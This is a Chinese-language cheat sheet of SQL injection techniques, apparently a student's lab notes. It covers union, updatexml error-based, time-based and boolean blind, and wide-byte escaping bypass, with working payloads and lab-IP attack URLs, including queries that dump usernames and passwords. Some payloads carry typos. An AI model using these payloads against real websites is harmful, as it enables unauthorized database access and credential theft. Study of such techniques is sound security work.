a-01-sql注入
sql注入
爆出来的密码为MD5加密
原理
QL注入,就是攻击者通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到让后台数据库执行恶意的SQL命令的目的,并根据程序返回的结果,获得某些攻击者想得知的数据。
范围
version()>5.0
利用方式
%27为’
%23为#
ascii()>97
手工注入
1 and 1=2
1 and 1=2 union
sqlmap注入
updatexml报错注入(用到了updatexml和group_concat,之后和手工注入一样)
0x7eASCII码,实为~
Updatexml()函数“updatexml(XML_document, XPath_string, new_value);”。
参数 描述
XML_document String格式,为XML文档对象的名称,文中为Doc
XPath_string Xpath格式的字符串
new_value String格式,替换查找到的符合条件的数据
select updatexml(1,concat(0x7e,(select user()),0x7e),1);
id=1 and (updatexml(1,concat(0x7e,(select%20version()),0x7e),1))
--group_concat里面套concat
select group_concat(concat(role,0x7e,username,0x3A,password,0x7e))
延时注入
select sleep(5);
没有回显,只有抓包看时间回显是否大于3,先放后面语句没问题2次必中if(,,sleep(3)))
and (if(length(database())=7),sleep(2),0)
and if(substr(database(),1,1)='i',sleep(3),0)
判断用的是length(database())=7或者assic(substr(database(),1,1)=97
之后操作就是加入手工注入
--注意刚开始的limit从0,1开始
and if(substr((select information_chema.table_name from information_chema.tables where tables_schema=database() limit 0,1),1,1)='u',sleep(3),0)
宽字节注入
原理
magic_quote_gpc被成为魔术引号的配置选项,当magic_quote_gpc=on的时候,这相当于PHP中使用了addslshes()函数,这个函数的功能是将单引号、双引号,反斜杠等进行转义。就是在前面加
当网站采用GBK、EUC-KR、SJIS等宽字节字符集编码时,由于php转义字符时采用单字节编码,而web传递给mysql时采用了多字节编码,这时就引发了多字节编码漏洞,
0xbf27
0xbf27 → 0xbf5c27
0xbf5c被解释为一个合法汉字
也就是:数据库采用gbk等宽字节,转义的时候是单字节加入。可以构造成汉字
利用方式
在有转义的前面多加一个%bf和原来注入方式一样了
--后面的数据用16进制表示,转义无法表示数据。
table_schema=0x69776562736563
http://192.168.12.100:9003/sqli/06.php?id=1�' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x69776562736563%23
布尔注入
and (select ascii(substr((zou),1,1)))>97
在zou里面改为手工注入就行
绕过手法
宽字节,%df'
空格,/**/
access暴力破解
首先判断?id=1 and 1=2
然后利用exist()
http://192.168.12.99/Production/PRODUCT_DETAIL.asp?id = 1513 and exists (select * from admin)
执行成功后页面正常返回,说明存在管理表。
exists (select password from admin)

浙公网安备 33010602011771号